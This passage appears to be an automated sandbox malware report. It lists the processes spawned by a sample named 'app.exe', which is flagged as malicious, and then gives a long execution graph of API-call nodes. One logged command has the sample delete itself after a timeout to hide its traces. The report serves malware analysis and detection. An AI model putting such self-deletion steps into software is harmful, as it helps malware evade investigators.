                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'290'240 bytes
                                                                                                                                            MD5 hash:75B9EF9142A78671D449C8D22AB6BE14
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 11%, ReversingLabs
• Detection: 11%, Virustotal
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:00:24:07
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
                                                                                                                                            Imagebase:0x90000
                                                                                                                                            File size:236'544 bytes
                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7cb400000
                                                                                                                                            File size:875'008 bytes
                                                                                                                                            MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:00:25:08
                                                                                                                                            Start date:05/05/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:timeout /t 5
                                                                                                                                            Imagebase:0xd40000
                                                                                                                                            File size:25'088 bytes
                                                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:3.6%
                                                                                                                                              Dynamic/Decrypted Code Coverage:92%
                                                                                                                                              Signature Coverage:52.4%
                                                                                                                                              Total number of Nodes:1938
                                                                                                                                              Total number of Limit Nodes:41
49 API calls 75100->76123 75101->75100 76122 25c1830 50 API calls 75101->76122 75104 257a5c9 HeapFree 75103->75104 75106 257a5ba HeapFree 75103->75106 75107 257a592 75103->75107 75104->75107 75106->75104 75108 257a6d5 75107->75108 75109 257a6fb 75107->75109 75111 259691e 2 API calls 75108->75111 75110 25dcaf8 50 API calls 75109->75110 75126 257a71b 75110->75126 75115 257a6e0 75111->75115 75112 257a2c3 75114 257a587 75112->75114 76125 25c3580 49 API calls 75112->76125 75119 257a690 75114->75119 75120 257a67c HeapFree 75114->75120 75117 257adfa HeapFree 75115->75117 75118 257ae09 75115->75118 75116 257a75d 76033 259691e 75116->76033 75117->75118 75118->74768 75119->75107 75123 257a696 HeapFree 75119->75123 75120->75119 75123->75107 75124 257a145 75124->75112 75124->75124 75128 25f0bd0 50 API calls 75124->75128 75131 25c1830 50 API calls 75124->75131 76124 25c3580 49 API calls 75124->76124 75126->75116 76126 25f1900 55 API calls 75126->76126 75128->75124 75129 25cc8b0 48 API calls 75130 257a80a 75129->75130 75132 25d814c 48 API calls 75130->75132 75131->75124 75133 257a83e 75132->75133 75134 257a862 HeapFree 75133->75134 75135 257a872 75133->75135 75134->75135 75136 257ae39 75135->75136 76039 2561b50 75135->76039 76075 25cca50 75136->76075 75138 257ad17 75140 257ad2d 75138->75140 75141 257ad1d HeapFree 75138->75141 76128 25d0450 48 API calls 75140->76128 75141->75140 75142 257ae73 76087 2581838 75142->76087 75143 257ab70 75143->75138 75155 257ab99 75143->75155 76127 2569950 48 API calls 75143->76127 75145 257abb6 75148 257abe4 75145->75148 75149 257abd4 HeapFree 75145->75149 76054 25c6a20 75148->76054 75149->75148 75151 257ad42 76129 25ca170 48 API calls 75151->76129 75152 257ae92 76106 257ea66 75152->76106 75153 257aeaa 76130 25800bf 48 API calls 75153->76130 75155->75138 75155->75145 75160 257aea5 75162 25cd2e0 55 API calls 75160->75162 75161 25617d0 49 API calls 75163 257ac44 75161->75163 75166 257aeca 75162->75166 75174 257ac5f HeapFree 75163->75174 75175 257ac6e 
75163->75175 75170 257aef7 75166->75170 75171 257aee3 HeapFree 75166->75171 75170->74768 75171->75170 75174->75175 75177 257ac85 75175->75177 75178 257ac74 HeapFree 75175->75178 75179 257ac9f 75177->75179 75180 257ac8e HeapFree 75177->75180 75178->75177 76073 25c9970 75179->76073 75180->75179 75186 25d8153 75185->75186 75189 2583b5a 75185->75189 75187 25d8155 75186->75187 75188 25d8183 75186->75188 75191 25cd430 2 API calls 75187->75191 76188 25610d0 48 API calls 75188->76188 75194 258a769 62 API calls 75189->75194 75192 25d816c 75191->75192 75192->75189 76187 25ec900 48 API calls 75192->76187 75194->74779 75197 25618f6 75195->75197 75198 256180d 75195->75198 75196 256192d 75196->74784 75197->75196 76190 25610d0 48 API calls 75197->76190 75198->75197 75200 25cd430 2 API calls 75198->75200 75201 25618df 75200->75201 75201->75197 76189 25ec900 48 API calls 75201->76189 75202 256197f 75203 256199e 75202->75203 75204 256198d HeapFree 75202->75204 75203->74784 75204->75203 76191 25c5900 75206->76191 75210 25623d0 75209->75210 75213 25623f4 75209->75213 75211 25623d2 75210->75211 75212 2562411 75210->75212 75214 25cd430 2 API calls 75211->75214 76226 25610d0 48 API calls 75212->76226 75213->74811 75217 25623e2 75214->75217 75216 2562416 75217->75213 76225 25ec900 48 API calls 75217->76225 75222 25d8608 75219->75222 75220 258430b 75220->74816 75220->74819 75222->75220 76227 25d832f 50 API calls 75222->76227 75224 25d873e 75224->75220 76228 25f1847 50 API calls 75224->76228 75225->74822 75226->74818 75227->74746 75228->74833 75229->74864 75230->74890 75231->74845 75232->74845 75233->74818 75234->74908 75235->74908 75236->74908 75237->74908 75238->74908 75239->74908 75240->74908 75241->74908 75242->74908 75243->74913 75245 25967dd 50 API calls 75244->75245 75246 2596700 75245->75246 75247 25cd430 2 API calls 75246->75247 75255 2596791 75246->75255 75248 2596721 75247->75248 75249 2596729 75248->75249 75250 25967ce 75248->75250 75252 25967dd 50 API calls 75249->75252 76229 
25ec900 48 API calls 75250->76229 75253 2596764 75252->75253 75254 25967dd 50 API calls 75253->75254 75253->75255 75254->75253 75255->74775 75256->74870 76230 25cd2f0 54 API calls 75257->76230 75259 25cd2e8 76231 25cd330 ExitProcess 75259->76231 75262->74776 75263->74783 75264->74796 75266 25c1a59 75265->75266 75267 25c1a61 CreateWaitableTimerExW 75265->75267 75266->75267 75268 25c1b40 75266->75268 75267->75268 75269 25c1a7d 75267->75269 75271 25c1b2e 75268->75271 75270 25c1b30 CloseHandle 75269->75270 75274 25c1ac5 SetWaitableTimer 75269->75274 75270->75268 75271->75268 75272 25c1b8e Sleep 75271->75272 75273 258651e 75272->75273 75273->74797 75274->75270 75275 25c1afb WaitForSingleObject CloseHandle 75274->75275 75275->75271 75275->75273 75276->74931 75277->74930 75278->74930 75279->74932 75280->74924 75281->74953 75283->74954 75285 25d982f 75284->75285 75286 25d978f 75284->75286 75777 25d8b49 8 API calls 75285->75777 75296 259aa3a 75286->75296 75753 25d91d2 75286->75753 75290 25d984d 75778 25d8b49 8 API calls 75290->75778 75291 25d97dc 75293 25d97e7 75291->75293 75294 25d9860 75291->75294 75298 25d97eb SysFreeString 75293->75298 75299 25d97f2 CoSetProxyBlanket 75293->75299 75294->75296 75297 25d9864 SysFreeString 75294->75297 75295 25d9854 75295->75294 75296->74959 75296->74961 75297->75296 75298->75299 75299->75296 75300 25d9883 75299->75300 75779 25d8b49 8 API calls 75300->75779 75302 25d9836 75302->75296 75304 25d91d2 62 API calls 75303->75304 75305 2581c5a 75304->75305 75306 25d91d2 62 API calls 75305->75306 75307 2581c66 75306->75307 75785 2581ba7 75307->75785 75310 2581cb9 75312 2581cc8 75310->75312 75313 2581cc1 SysFreeString 75310->75313 75311 2581c7f 75316 2581c9c 75311->75316 75317 2581c95 SysFreeString 75311->75317 75314 2581ccc SysFreeString 75312->75314 75315 2581cd3 75312->75315 75313->75312 75314->75315 75791 2580194 75315->75791 75319 2581ca0 SysFreeString 75316->75319 75320 2581ca7 75316->75320 75317->75316 75319->75320 75320->74965 75320->74971 
75331 259922b 75330->75331 75332 259921b 75330->75332 75333 2599241 75331->75333 75334 2599231 HeapFree 75331->75334 75332->75331 75910 25726a3 HeapFree HeapFree 75332->75910 75333->74970 75334->75333 75337 25991cb 75336->75337 75338 25991f1 75336->75338 75337->75338 75341 25991df HeapFree 75337->75341 75339 2599207 75338->75339 75340 25991f7 HeapFree 75338->75340 75339->75060 75340->75339 75341->75337 75343 25967ee 75342->75343 75344 25967f3 75342->75344 75343->74973 75344->75343 75911 25eca90 48 API calls 75344->75911 75352 25d9760 66 API calls 75351->75352 75353 259bd2c 75352->75353 75354 25cd430 2 API calls 75353->75354 75734 25a0100 75353->75734 75356 259bd5a 75354->75356 75357 25a01a0 75356->75357 75359 259bd69 75356->75359 76000 25ec900 48 API calls 75357->76000 75359->75359 75360 25d814c 48 API calls 75359->75360 75361 259bdda 75360->75361 75361->75361 75362 25d814c 48 API calls 75361->75362 75364 259be75 75362->75364 75363 25a01af 75363->74986 75365 25d814c 48 API calls 75364->75365 75366 259bf1e 75365->75366 75367 25d814c 48 API calls 75366->75367 75368 259bfc4 75367->75368 75369 25d814c 48 API calls 75368->75369 75370 259c052 75369->75370 75371 25d814c 48 API calls 75370->75371 75372 259c0f7 75371->75372 75373 25d814c 48 API calls 75372->75373 75374 259c183 75373->75374 75375 25d814c 48 API calls 75374->75375 75376 259c217 75375->75376 75377 25d814c 48 API calls 75376->75377 75427 259c2a7 75377->75427 75378 259c6ae 75380 25991b0 2 API calls 75378->75380 75379 25623c0 48 API calls 75379->75427 75382 259c6cf 75380->75382 75381 25d91d2 62 API calls 75381->75427 75382->75382 75384 2581c36 94 API calls 75382->75384 75383 2581ba7 8 API calls 75383->75427 75385 259c75c 75384->75385 75386 259c823 75385->75386 75392 259c76b 75385->75392 75922 25cc4e0 54 API calls 75386->75922 75387 259c473 SysFreeString 75387->75427 75389 259c456 SysFreeString 75389->75427 75390 259c491 SysFreeString 75390->75427 75391 259c870 75923 25d95b0 HeapFree 75391->75923 75397 2581c36 94 
API calls 75392->75397 75561 259c794 75392->75561 75393 259c4a2 HeapFree 75393->75427 75395 2581bfe 3 API calls 75408 259e59c 75395->75408 75396 259c7a2 75920 25cc4e0 54 API calls 75396->75920 75400 259c9e5 75397->75400 75398 259c889 75401 25623c0 48 API calls 75398->75401 75403 259e537 75400->75403 75418 259c9fe 75400->75418 75405 259c8b7 75401->75405 75402 259c817 75921 25d95b0 HeapFree 75402->75921 75955 25cc4e0 54 API calls 75403->75955 75924 25cc4e0 54 API calls 75405->75924 75415 259c877 75408->75415 75957 25d95b0 HeapFree 75408->75957 75410 259c690 HeapFree 75410->75427 75411 259e584 75956 25d95b0 HeapFree 75411->75956 75412 259c81e 75422 259c939 75412->75422 75423 259c924 HeapFree 75412->75423 75413 2580194 85 API calls 75413->75427 75415->74986 75416 259c8f5 75420 259c8fc HeapFree 75416->75420 75421 259c90e 75416->75421 75418->75418 75426 25d814c 48 API calls 75418->75426 75419 2581bfe HeapFree HeapFree HeapFree 75419->75427 75420->75421 75424 2581bfe 3 API calls 75421->75424 75425 25991b0 2 API calls 75422->75425 75423->75422 75424->75412 75425->75415 75428 259caac 75426->75428 75427->75378 75427->75379 75427->75381 75427->75383 75427->75387 75427->75389 75427->75390 75427->75393 75427->75396 75427->75398 75427->75410 75427->75413 75427->75419 75918 25836d9 50 API calls 75427->75918 75919 25eeb2c 50 API calls 75427->75919 75431 259caec 75428->75431 75925 25837b6 50 API calls 75428->75925 75431->75431 75432 25d814c 48 API calls 75431->75432 75433 259cb88 75432->75433 75435 259cbc8 75433->75435 75926 25837b6 50 API calls 75433->75926 75435->75435 75436 25d814c 48 API calls 75435->75436 75437 259cc64 75436->75437 75439 259cca4 75437->75439 75927 25837b6 50 API calls 75437->75927 75439->75439 75440 25d814c 48 API calls 75439->75440 75441 259cd40 75440->75441 75443 259cd80 75441->75443 75928 25837b6 50 API calls 75441->75928 75443->75443 75444 25d814c 48 API calls 75443->75444 75445 259ce1c 75444->75445 75447 259ce5c 75445->75447 75929 25837b6 50 API calls 
75445->75929 75447->75447 75448 25d814c 48 API calls 75447->75448 75449 259cef8 75448->75449 75451 259cf38 75449->75451 75930 25837b6 50 API calls 75449->75930 75452 25d814c 48 API calls 75451->75452 75453 259cfd4 75452->75453 75455 259d014 75453->75455 75931 25837b6 50 API calls 75453->75931 75455->75455 75456 25d814c 48 API calls 75455->75456 75457 259d0b0 75456->75457 75459 259d0f0 75457->75459 75932 25837b6 50 API calls 75457->75932 75459->75459 75460 25d814c 48 API calls 75459->75460 75461 259d18c 75460->75461 75463 259d1cc 75461->75463 75933 25837b6 50 API calls 75461->75933 75464 25d814c 48 API calls 75463->75464 75465 259d268 75464->75465 75467 259d2a8 75465->75467 75934 25837b6 50 API calls 75465->75934 75467->75467 75468 25d814c 48 API calls 75467->75468 75469 259d344 75468->75469 75471 259d384 75469->75471 75935 25837b6 50 API calls 75469->75935 75471->75471 75472 25d814c 48 API calls 75471->75472 75473 259d431 75472->75473 75475 259d471 75473->75475 75936 25837b6 50 API calls 75473->75936 75475->75475 75476 25d814c 48 API calls 75475->75476 75477 259d51e 75476->75477 75479 259d55e 75477->75479 75937 25837b6 50 API calls 75477->75937 75479->75479 75480 25d814c 48 API calls 75479->75480 75481 259d5fa 75480->75481 75483 259d63a 75481->75483 75938 25837b6 50 API calls 75481->75938 75484 25d814c 48 API calls 75483->75484 75485 259d6d6 75484->75485 75487 259d716 75485->75487 75939 25837b6 50 API calls 75485->75939 75487->75487 75488 25d814c 48 API calls 75487->75488 75489 259d7b2 75488->75489 75491 259d7f2 75489->75491 75940 25837b6 50 API calls 75489->75940 75491->75491 75492 25d814c 48 API calls 75491->75492 75493 259d88e 75492->75493 75495 259d8ce 75493->75495 75941 25837b6 50 API calls 75493->75941 75496 25d814c 48 API calls 75495->75496 75497 259d96a 75496->75497 75499 259d9aa 75497->75499 75942 25837b6 50 API calls 75497->75942 75499->75499 75500 25d814c 48 API calls 75499->75500 75501 259da46 75500->75501 75503 259da86 75501->75503 75943 25837b6 50 API 
calls 75501->75943 75503->75503 75504 25d814c 48 API calls 75503->75504 75505 259db22 75504->75505 75507 259db62 75505->75507 75944 25837b6 50 API calls 75505->75944 75507->75507 75508 25d814c 48 API calls 75507->75508 75509 259dbfe 75508->75509 75511 259dc3e 75509->75511 75945 25837b6 50 API calls 75509->75945 75511->75511 75512 25d814c 48 API calls 75511->75512 75513 259dcda 75512->75513 75515 259dd1a 75513->75515 75946 25837b6 50 API calls 75513->75946 75516 25d814c 48 API calls 75515->75516 75517 259ddb6 75516->75517 75519 259ddf6 75517->75519 75947 25837b6 50 API calls 75517->75947 75519->75519 75520 25d814c 48 API calls 75519->75520 75521 259de92 75520->75521 75523 259ded2 75521->75523 75948 25837b6 50 API calls 75521->75948 75523->75523 75524 25d814c 48 API calls 75523->75524 75525 259df6e 75524->75525 75527 259dfae 75525->75527 75949 25837b6 50 API calls 75525->75949 75528 25d814c 48 API calls 75527->75528 75529 259e04a 75528->75529 75531 259e08a 75529->75531 75950 25837b6 50 API calls 75529->75950 75531->75531 75532 25d814c 48 API calls 75531->75532 75533 259e126 75532->75533 75535 259e166 75533->75535 75951 25837b6 50 API calls 75533->75951 75535->75535 75536 25d814c 48 API calls 75535->75536 75537 259e202 75536->75537 75539 259e242 75537->75539 75952 25837b6 50 API calls 75537->75952 75539->75539 75540 25d814c 48 API calls 75539->75540 75541 259e2de 75540->75541 75543 259e31e 75541->75543 75953 25837b6 50 API calls 75541->75953 75543->75543 75544 25d814c 48 API calls 75543->75544 75545 259e3ba 75544->75545 75551 259e3fc 75545->75551 75954 25837b6 50 API calls 75545->75954 75546 259e52e 75548 25991b0 2 API calls 75546->75548 75549 259e5ed 75548->75549 75549->75549 75550 25c68a0 65 API calls 75549->75550 75553 259e67c 75550->75553 75551->75363 75551->75546 75552 25a0130 75551->75552 75554 25991b0 2 API calls 75552->75554 75553->75363 75555 25d814c 48 API calls 75553->75555 75556 25a0149 75554->75556 75557 259e6f2 75555->75557 75560 2581bfe 3 API calls 
75556->75560 75558 259e712 75557->75558 75958 25837b6 50 API calls 75557->75958 75562 25d814c 48 API calls 75558->75562 75560->75561 75561->75395 75563 259e76d 75562->75563 75564 259e78e 75563->75564 75959 25837b6 50 API calls 75563->75959 75566 25d814c 48 API calls 75564->75566 75567 259e7df 75566->75567 75569 259e7fa 75567->75569 75960 25837b6 50 API calls 75567->75960 75570 25d814c 48 API calls 75569->75570 75571 259e87b 75570->75571 75572 259e8a5 75571->75572 75961 25837b6 50 API calls 75571->75961 75574 25d814c 48 API calls 75572->75574 75575 259e8f2 75574->75575 75577 259e90d 75575->75577 75962 25837b6 50 API calls 75575->75962 75578 25d814c 48 API calls 75577->75578 75579 259e99d 75578->75579 75581 259e9c9 75579->75581 75963 25837b6 50 API calls 75579->75963 75582 25d814c 48 API calls 75581->75582 75583 259ea78 75582->75583 75585 259ea9c 75583->75585 75964 25837b6 50 API calls 75583->75964 75586 25d814c 48 API calls 75585->75586 75587 259eb59 75586->75587 75589 259eb83 75587->75589 75965 25837b6 50 API calls 75587->75965 75590 25d814c 48 API calls 75589->75590 75591 259ec06 75590->75591 75592 259ec30 75591->75592 75966 25837b6 50 API calls 75591->75966 75594 25d814c 48 API calls 75592->75594 75595 259ec92 75594->75595 75596 259ecba 75595->75596 75967 25837b6 50 API calls 75595->75967 75598 25d814c 48 API calls 75596->75598 75599 259ed15 75598->75599 75601 259ed36 75599->75601 75968 25837b6 50 API calls 75599->75968 75602 25d814c 48 API calls 75601->75602 75603 259edbd 75602->75603 75605 259ede5 75603->75605 75969 25837b6 50 API calls 75603->75969 75606 25d814c 48 API calls 75605->75606 75607 259eea0 75606->75607 75608 259eecc 75607->75608 75970 25837b6 50 API calls 75607->75970 75610 25d814c 48 API calls 75608->75610 75611 259ef1f 75610->75611 75612 259ef3f 75611->75612 75971 25837b6 50 API calls 75611->75971 75614 25d814c 48 API calls 75612->75614 75615 259efa5 75614->75615 75616 259efcd 75615->75616 75972 25837b6 50 API calls 75615->75972 75618 25d814c 48 
API calls 75616->75618 75619 259f033 75618->75619 75620 259f05b 75619->75620 75973 25837b6 50 API calls 75619->75973 75622 25d814c 48 API calls 75620->75622 75623 259f0b8 75622->75623 75625 259f0d9 75623->75625 75974 25837b6 50 API calls 75623->75974 75626 25d814c 48 API calls 75625->75626 75627 259f182 75626->75627 75629 259f1a2 75627->75629 75975 25837b6 50 API calls 75627->75975 75630 25d814c 48 API calls 75629->75630 75631 259f236 75630->75631 75633 259f262 75631->75633 75976 25837b6 50 API calls 75631->75976 75634 25d814c 48 API calls 75633->75634 75635 259f2f4 75634->75635 75637 259f320 75635->75637 75977 25837b6 50 API calls 75635->75977 75638 25d814c 48 API calls 75637->75638 75639 259f3b0 75638->75639 75640 259f3de 75639->75640 75978 25837b6 50 API calls 75639->75978 75642 25d814c 48 API calls 75640->75642 75643 259f431 75642->75643 75644 259f451 75643->75644 75979 25837b6 50 API calls 75643->75979 75646 25d814c 48 API calls 75644->75646 75647 259f4a2 75646->75647 75649 259f4bd 75647->75649 75980 25837b6 50 API calls 75647->75980 75650 25d814c 48 API calls 75649->75650 75651 259f53f 75650->75651 75653 259f56c 75651->75653 75981 25837b6 50 API calls 75651->75981 75654 25d814c 48 API calls 75653->75654 75655 259f5ee 75654->75655 75656 259f61b 75655->75656 75982 25837b6 50 API calls 75655->75982 75658 25d814c 48 API calls 75656->75658 75659 259f672 75658->75659 75660 259f693 75659->75660 75983 25837b6 50 API calls 75659->75983 75662 25d814c 48 API calls 75660->75662 75663 259f6ea 75662->75663 75664 259f70a 75663->75664 75984 25837b6 50 API calls 75663->75984 75666 25d814c 48 API calls 75664->75666 75667 259f770 75666->75667 75668 259f798 75667->75668 75985 25837b6 50 API calls 75667->75985 75670 25d814c 48 API calls 75668->75670 75671 259f7fe 75670->75671 75672 259f826 75671->75672 75986 25837b6 50 API calls 75671->75986 75674 25d814c 48 API calls 75672->75674 75675 259f883 75674->75675 75677 259f8a4 75675->75677 75987 25837b6 50 API calls 75675->75987 75678 
25d814c 48 API calls 75677->75678 75679 259f972 75678->75679 75680 259f99c 75679->75680 75988 25837b6 50 API calls 75679->75988 75682 25d814c 48 API calls 75680->75682 75683 259f9ef 75682->75683 75684 259fa0f 75683->75684 75989 25837b6 50 API calls 75683->75989 75686 25d814c 48 API calls 75684->75686 75687 259fa7e 75686->75687 75689 259faad 75687->75689 75990 25837b6 50 API calls 75687->75990 75690 25d814c 48 API calls 75689->75690 75691 259fb5c 75690->75691 75693 259fb80 75691->75693 75991 25837b6 50 API calls 75691->75991 75694 25d814c 48 API calls 75693->75694 75695 259fc29 75694->75695 75696 259fc49 75695->75696 75992 25837b6 50 API calls 75695->75992 75698 25d814c 48 API calls 75696->75698 75699 259fcaf 75698->75699 75700 259fcd7 75699->75700 75993 25837b6 50 API calls 75699->75993 75702 25d814c 48 API calls 75700->75702 75703 259fd32 75702->75703 75704 259fd53 75703->75704 75994 25837b6 50 API calls 75703->75994 75706 25d814c 48 API calls 75704->75706 75707 259fdb0 75706->75707 75709 259fdd1 75707->75709 75995 25837b6 50 API calls 75707->75995 75710 25d814c 48 API calls 75709->75710 75711 259fe89 75710->75711 75713 259feb1 75711->75713 75996 25837b6 50 API calls 75711->75996 75714 25d814c 48 API calls 75713->75714 75715 259ff5a 75714->75715 75716 259ff7a 75715->75716 75997 25837b6 50 API calls 75715->75997 75718 25d814c 48 API calls 75716->75718 75719 259ffe0 75718->75719 75724 25a0008 75719->75724 75998 25837b6 50 API calls 75719->75998 75721 25a00bb 75722 25991b0 2 API calls 75721->75722 75723 25a00c9 75722->75723 75725 25a00e8 75723->75725 75726 25a00d3 HeapFree 75723->75726 75724->75721 75728 25a0099 HeapFree 75724->75728 75731 25a014b 75724->75731 75912 2581bfe 75725->75912 75726->75725 75728->75724 75730 2581bfe 3 API calls 75730->75734 75732 25a0162 75731->75732 75733 25a0153 HeapFree 75731->75733 75735 25991b0 2 API calls 75732->75735 75733->75732 75734->75415 75999 25d95b0 HeapFree 75734->75999 75736 25a0169 75735->75736 75736->75556 75737 25a0173 
HeapFree 75736->75737 75737->75556 75738->74971 75739->74971 75742->75006 75743->75018 75744->75032 75745->75045 75746->75049 75747->75054 75748->75079 75749->74998 75750->74998 76002 25cc8c4 48 API calls 75751->76002 75754 25d9235 75753->75754 75756 25d91dd 75753->75756 75754->75290 75754->75291 75755 25d9460 75782 25610d0 48 API calls 75755->75782 75756->75754 75756->75755 75757 25d92cf 75756->75757 75759 25cd430 2 API calls 75757->75759 75761 25d92dd 75759->75761 75760 25d9465 75783 25ec900 48 API calls 75760->75783 75761->75760 75770 25d92e5 75761->75770 75763 25d9471 75784 25d8b49 8 API calls 75763->75784 75765 25d947b 75767 25d947f 75765->75767 75766 25d9405 75768 25d9441 75766->75768 75769 25d9411 SysAllocStringLen 75766->75769 75768->75754 75774 25d9447 HeapFree 75768->75774 75769->75763 75772 25d941d SysStringLen 75769->75772 75770->75766 75780 25f1847 50 API calls 75770->75780 75772->75768 75773 25d942a 75772->75773 75781 25d8b49 8 API calls 75773->75781 75774->75754 75776 25d9434 SysFreeString 75776->75767 75777->75302 75778->75295 75779->75302 75780->75770 75781->75776 75782->75760 75783->75763 75784->75765 75786 2581bc8 75785->75786 75787 2581bda 75786->75787 75788 2581bcc 75786->75788 75793 25d8b49 8 API calls 75787->75793 75788->75310 75788->75311 75790 2581be1 75790->75788 75794 25801bb 75791->75794 75793->75790 75795 25801cf 75794->75795 75796 25801fd 75795->75796 75797 25801d3 75795->75797 75848 25d8b49 8 API calls 75796->75848 75801 25801f6 75797->75801 75847 25d95b0 HeapFree 75797->75847 75799 2580204 75799->75801 75802 2580343 75801->75802 75806 258027c 75801->75806 75829 258033c 75801->75829 75861 25d8b49 8 API calls 75802->75861 75804 258034a 75804->75829 75805 2580369 SafeArrayDestroy 75809 2580c62 75805->75809 75810 25803dc 75805->75810 75806->75805 75849 25dcaf8 75806->75849 75894 25d8b49 8 API calls 75809->75894 75810->75829 75863 25d04d0 75810->75863 75811 25802c5 75813 2580e75 75811->75813 75819 25802e6 75811->75819 75898 25f1900 55 API 
calls 75813->75898 75816 2580c82 75820 2580c9c 75816->75820 75821 2580cc3 75816->75821 75817 2580338 75862 25da581 HeapFree 75817->75862 75819->75817 75823 258102f 75819->75823 75820->75804 75827 2580cb2 HeapFree 75820->75827 75895 25d95b0 HeapFree 75821->75895 75900 25ecaf0 48 API calls 75823->75900 75825 25d814c 48 API calls 75843 258040c 75825->75843 75826 2581043 75827->75804 75828 2580d72 75828->75829 75830 2580f66 HeapFree 75828->75830 75830->75829 75831 2580ddb 75832 2580f1d HeapFree 75831->75832 75833 2580e70 75831->75833 75832->75833 75899 25726a3 HeapFree HeapFree 75833->75899 75835 2580dc6 75896 25d8b49 8 API calls 75835->75896 75838 258092e VariantClear 75839 2580e02 75838->75839 75838->75843 75897 25d8b49 8 API calls 75839->75897 75841 2580dcd 75841->75831 75843->75825 75843->75826 75843->75828 75843->75831 75843->75833 75843->75835 75843->75838 75844 2580c4d 75843->75844 75846 2580b84 HeapFree 75843->75846 75891 25da5bc 49 API calls 75843->75891 75892 2596b04 50 API calls 75843->75892 75893 25ed3d0 50 API calls 75844->75893 75846->75843 75848->75799 75850 25dcb36 75849->75850 75851 25dcb00 75849->75851 75850->75811 75852 25dcb40 75851->75852 75853 25dcb16 75851->75853 75902 25610d0 48 API calls 75852->75902 75855 25cd430 2 API calls 75853->75855 75857 25dcb24 75855->75857 75856 25dcb45 75860 25dcbb8 75856->75860 75903 25d8210 HeapReAlloc HeapFree GetProcessHeap RtlAllocateHeap 75856->75903 75857->75850 75901 25ec900 48 API calls 75857->75901 75860->75811 75861->75804 75862->75805 75864 25d04e7 TlsGetValue 75863->75864 75865 25d05b2 75863->75865 75868 25d04f4 75864->75868 75904 25f0970 48 API calls 75865->75904 75869 25d050e TlsGetValue 75868->75869 75875 25d057e 75868->75875 75905 25f0970 48 API calls 75868->75905 75872 25d051b 75869->75872 75869->75875 75873 25d0564 BCryptGenRandom 75872->75873 75874 25cd430 2 API calls 75872->75874 75873->75875 75876 25d0534 75874->75876 75875->75843 75877 25d05dc 75876->75877 75878 25d053c 75876->75878 75907 
25ec900 48 API calls 75877->75907 75879 25d055b TlsSetValue 75878->75879 75906 25f0970 48 API calls 75878->75906 75879->75873 75883 25d05eb 75884 25d0629 TlsSetValue HeapFree 75883->75884 75908 25f0970 48 API calls 75883->75908 75887 25d0668 75884->75887 75888 25d0665 75884->75888 75909 25f0970 48 API calls 75887->75909 75889 25d067a TlsSetValue 75888->75889 75889->75843 75893->75809 75894->75816 75896->75841 75897->75841 75898->75831 75899->75828 75901->75850 75902->75856 75903->75860 75904->75864 75905->75869 75906->75879 75907->75883 75908->75884 75909->75889 75910->75332 75913 2581c1d 75912->75913 75914 2581c0e 75912->75914 75915 2581c31 75913->75915 75916 2581c22 HeapFree 75913->75916 75914->75913 76001 25726a3 HeapFree HeapFree 75914->76001 75915->75730 75916->75915 75918->75427 75919->75427 75920->75402 75922->75391 75924->75416 75925->75431 75926->75435 75927->75439 75928->75443 75929->75447 75930->75451 75931->75455 75932->75459 75933->75463 75934->75467 75935->75471 75936->75475 75937->75479 75938->75483 75939->75487 75940->75491 75941->75495 75942->75499 75943->75503 75944->75507 75945->75511 75946->75515 75947->75519 75948->75523 75949->75527 75950->75531 75951->75535 75952->75539 75953->75543 75954->75551 75955->75411 75958->75558 75959->75564 75960->75569 75961->75572 75962->75577 75963->75581 75964->75585 75965->75589 75966->75592 75967->75596 75968->75601 75969->75605 75970->75608 75971->75612 75972->75616 75973->75620 75974->75625 75975->75629 75976->75633 75977->75637 75978->75640 75979->75644 75980->75649 75981->75653 75982->75656 75983->75660 75984->75664 75985->75668 75986->75672 75987->75677 75988->75680 75989->75684 75990->75689 75991->75693 75992->75696 75993->75700 